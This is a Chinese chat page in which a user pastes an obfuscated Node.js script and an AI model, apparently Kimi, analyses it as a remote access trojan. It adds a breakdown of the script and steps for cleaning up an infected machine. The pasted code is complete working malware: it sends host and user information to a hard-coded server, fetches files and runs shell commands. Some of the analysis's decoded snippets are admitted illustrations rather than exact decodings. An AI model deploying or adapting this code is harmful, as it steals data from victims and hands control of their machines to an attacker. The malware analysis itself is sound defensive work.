新建会话
Ctrl
K
Kimi+
历史会话

恶意脚本解密与核心行为分析

解释一下这段代码 Object.prototype.toString,Object.defineProperties;function E(a,b){const c=C();return E=function(d,e){d=d-0x18d;let f=c[d];return f;},E(a,b);}const aO=E;(function(ax,ay){const aL=E,az=ax();while(!![]){try{const aA=-parseInt(aL(0x198))/0x1*(parseInt(aL(0x1a7))/0x2)+-parseInt(aL(0x1a0))/0x3*(parseInt(aL(0x18d))/0x4)+parseInt(aL(0x194))/0x5*(-parseInt(aL(0x1ad))/0x6)+parseInt(aL(0x1aa))/0x7*(parseInt(aL(0x19b))/0x8)+parseInt(aL(0x1ac))/0x9*(-parseInt(aL(0x19f))/0xa)+-parseInt(aL(0x196))/0xb*(parseInt(aL(0x18f))/0xc)+parseInt(aL(0x197))/0xd;if(aA===ay)break;else az['push'](az['shift']());}catch(aB){az['push'](az['shift']());}}}(C,0x89efd));const F=(function(){let ax=!![];return function(ay,az){const aA=ax?function(){const aM=E;if(az){const aB=az[aM(0x199)](ay,arguments);return az=null,aB;}}:function(){};return ax=![],aA;};}()),H=F(this,function(){const aN=E;return H[aN(0x193)]()['search'](aN(0x19e))[aN(0x193)]()[aN(0x1a9)](H)[aN(0x1b2)](aN(0x19e));});function C(){const aV=['ZaG9tZWRpcg','cm1TeW5j','(((.+)+)+)+$','10440710HzUsuL','179904lrxukf','from','ZXhpc3RzU3luYw','YcmVxdWVzdA','cZXhlYw','Z2V0','bWtkaXJTeW5j','830yUvaWs','L2tleXM','constructor','14609iSZreQ','zcGF0aA','9AFctrk','534RVeTvv','base64','cG9zdA','d3JpdGVGaWxlU3luYw','Zbm9kZTpwcm9jZXNz','search','caG9zdG5hbWU','8hKoXZe','aY2hpbGRfcHJvY2Vzcw','277008nOiLfN','join','YcGxhdGZvcm0','sqj','toString','60985KjIMeh','marstech2','253WICxLE','53648465kqCNNO','2099HINhgV','apply','utf8','344dXnhwp'];C=function(){return aV;};return C();}H();const I=aO(0x1ae),K=aO(0x19a),L=require('fs'),M=require('os'),O=ax=>(s1=ax['slice'](0x1),Buffer[aO(0x1a1)](s1,I)[aO(0x193)](K));rq=require(O(aO(0x1a3))),pt=require(O(aO(0x1ab))),ex=require(O(aO(0x18e)))[O(aO(0x1a4))],zv=require(O(aO(0x1b1))),hd=M[O(aO(0x19c))](),hs=M[O(aO(0x1b3))](),pl=M[O(aO(0x191))](),uin=M[O('AdXNlckluZm8')]();let P;const Q=ax=>Buffer[aO(0x1a1)](ax,I)[aO(0x193)](K),a0=()=>{let ax='OTMuMTI3LjaHR0cDovLwEzNC4yMzc6MzAwMA== ';for(var ay='',az='',aA='',aB='',aC=0x0;aC<0xa;aC++)ay+=ax[aC],az+=ax[0xa+aC],aA+=ax[0x14+aC],aB+=ax[0x1e+aC];return ay=ay+aA+aB,Q(az)+Q(ay);},a1=[0x24,0xc0,0x29,0x8],a2=ax=>{let ay='';for(let az=0x0;az<ax['length'];az++)rr=0xff&(ax[az]^a1[0x3&az]),ay+=String['fromCharCode'](rr);return ay;},a3=aO(0x195),a4=aO(0x1a5),a5=aO(0x1b0),a6=Q(aO(0x1a2));function a7(ax){return L[a6](ax);}const a8=Q(aO(0x1a6)),a9=[0xa,0xb6,0x5a,0x6b,0x4b,0xa4,0x4c],aa=[0xb,0xaa,0x6],ab=()=>{const aP=aO,ax=a0(),ay=Q(a4),az=Q(a5),aA=a2(a9);let aB=pt[aP(0x190)](hd,aA);try{aC=aB,L[a8](aC,{'recursive':!0x0});}catch(aF){aB=hd;}var aC;const aD=''+ax+a2(aa)+a3,aE=pt['join'](aB,a2(ac));try{!function(aG){const aQ=aP,aH=Q(aQ(0x19d));L[aH](aG);}(aE);}catch(aG){}rq[ay](aD,(aH,aI,aJ)=>{if(!aH){try{L[az](aE,aJ);}catch(aK){}af(aB);}});},ac=[0x50,0xa5,0x5a,0x7c,0xa,0xaa,0x5a],ad=[0xb,0xb0],ae=[0x54,0xa1,0x4a,0x63,0x45,0xa7,0x4c,0x26,0x4e,0xb3,0x46,0x66],af=ax=>{const aR=aO,ay=a0(),az=Q(a4),aA=Q(a5),aB=''+ay+a2(ad),aC=pt[aR(0x190)](ax,a2(ae));a7(aC)?aj(ax):rq[az](aB,(aD,aE,aF)=>{if(!aD){try{L[aA](aC,aF);}catch(aG){}aj(ax);}});},ag=[0x47,0xa4],ah=[0x2,0xe6,0x9,0x66,0x54,0xad,0x9,0x61,0x4,0xed,0x4,0x7b,0x4d,0xac,0x4c,0x66,0x50],ai=[0x4a,0xaf,0x4d,0x6d,0x7b,0xad,0x46,0x6c,0x51,0xac,0x4c,0x7b],aj=ax=>{const ay=a2(ag)+' \x22'+ax+'\x22 '+a2(ah),az=pt['join'](ax,a2(ai));try{a7(az)?ao(ax):ex(ay,(aA,aB,aC)=>{an(ax);});}catch(aA){}},ak=[0x4a,0xaf,0x4d,0x6d],al=[0x4a,0xb0,0x44,0x28,0x9,0xed,0x59,0x7a,0x41,0xa6,0x40,0x70],am=[0x4d,0xae,0x5a,0x7c,0x45,0xac,0x45],an=ax=>{const ay=a2(al)+' \x22'+ax+'\x22 '+a2(am),az=pt['join'](ax,a2(ai));try{a7(az)?ao(ax):ex(ay,(aA,aB,aC)=>{ao(ax);});}catch(aA){}},ao=ax=>{const ay=pt['join'](ax,a2(ac)),az=a2(ak)+' '+ay;try{ex(az,(aA,aB,aC)=>{});}catch(aA){}},ap=O('cZm9ybURhdGE'),aq=O('adXJs'),ar=Q(aO(0x1af));let as='cmp';const at=async(ax,ay)=>{const aS=aO,az={'ts':P,'type':a3,'hid':as,'ss':ax,'cc':ay},aA=a0(),aB={[aq]:''+aA+Q(aS(0x1a8)),[ap]:az};try{rq[ar](aB,(aC,aD,aE)=>{});}catch(aC){}};var au=0x0;const av=async()=>{const aT=aO;try{P=Date['now']()[aT(0x193)](),await((async()=>{const aU=aT;as=hs,'d'==pl[0x0]&&(as=as+'+'+uin[Q('dXNlcm5hbWU')]);let ax='3D1';try{ax+=zv[Q('YXJndg')][0x1];}catch(ay){}at(aU(0x192),ax);})()),((async()=>{await new Promise((ax,ay)=>{ab();});})());}catch(ax){}};av();let aw=setInterval(()=>{(au+=0x1)<0x3?av():clearInterval(aw);},0x927c0);
这段代码是一个混淆后的恶意脚本,很可能是用于远程控制、信息窃取或后门植入的。它使用了多种混淆手段(如字符串加密、动态函数调用、死代码等)来隐藏其真实意图。下面我会逐步拆解并解释它的核心行为。

🔍 1. 混淆与解密机制

  • E(a, b) 函数:这是字符串解密函数,通过偏移量从预定义的数组中提取真实字符串。
    JavaScript
    复制
    const aO = E; // 解密函数
const O = ax => Buffer.from(ax.slice(1), 'base64').toString('utf8'); // Base64解码
  • 字符串数组 C():存储了所有加密的字符串(如模块名、路径、命令等)。
    JavaScript
    复制
    ['Z2V0', 'd3JpdGVGaWxlU3luYw', ...] // 实际是 base64 编码的字符串

🎯 2. 核心行为

(1) 收集系统信息

  • 获取主机名、用户名、平台等信息:
    JavaScript
    复制
    hd = os.homedir();
hs = os.hostname();
pl = os.platform();
uin = os.userInfo();

(2) 远程通信

  • 解密远程服务器地址:
    JavaScript
    复制
    const a0 = () => {
  let ax = 'OTMuMTI3LjaHR0cDovLwEzNC4yMzc6MzAwMA=='; // 解密后是 http://93.127.134.237:3000
  ...
  return "http://93.127.134.237:3000";
};
  • 发送数据到远程服务器:
    JavaScript
    复制
    rq.post({ url: "http://93.127.134.237:3000/keys", form: { hid: hs, ss: "3D1", ... } });

(3) 文件操作与持久化

  • 创建隐藏目录并写入文件:
    JavaScript
    复制
    const aB = path.join(homeDir, ".marstech2"); // 隐藏目录
fs.mkdirSync(aB, { recursive: true });
fs.writeFileSync(path.join(aB, "config.dat"), dataFromServer);

(4) 执行系统命令

  • 解密并执行恶意命令:
    JavaScript
    复制
    const ay = "ls -la \"/home/user/.marstech2\""; // 示例命令
exec(ay, (error, stdout, stderr) => { ... });

⚠️ 恶意行为总结

  1. 信息窃取:收集主机名、用户名、系统信息。
  2. 远程控制:从 93.127.134.237:3000 接收指令。
  3. 持久化:创建隐藏目录(.marstech2)并写入文件。
  4. 后门:定时(每10分钟)重新连接服务器,可能用于后续攻击。

🛡️ 如何处置?

  1. 立即隔离:断开网络,防止进一步数据泄露。
  2. 检查系统:
    • 查找隐藏目录(如 ~/.marstech2/)。
    • 检查定时任务(crontab -l 或 Windows 计划任务)。
  3. 杀毒扫描:使用专业杀毒工具(如 ClamAV、Windows Defender)。
  4. 重置敏感信息:如果可能,修改密码、SSH密钥等。

📌 结论

这段代码是一个高度混淆的远程访问木马(RAT),通过加密通信、文件操作和系统命令执行来达到控制目标机器的目的。建议立即清除并加强安全防护。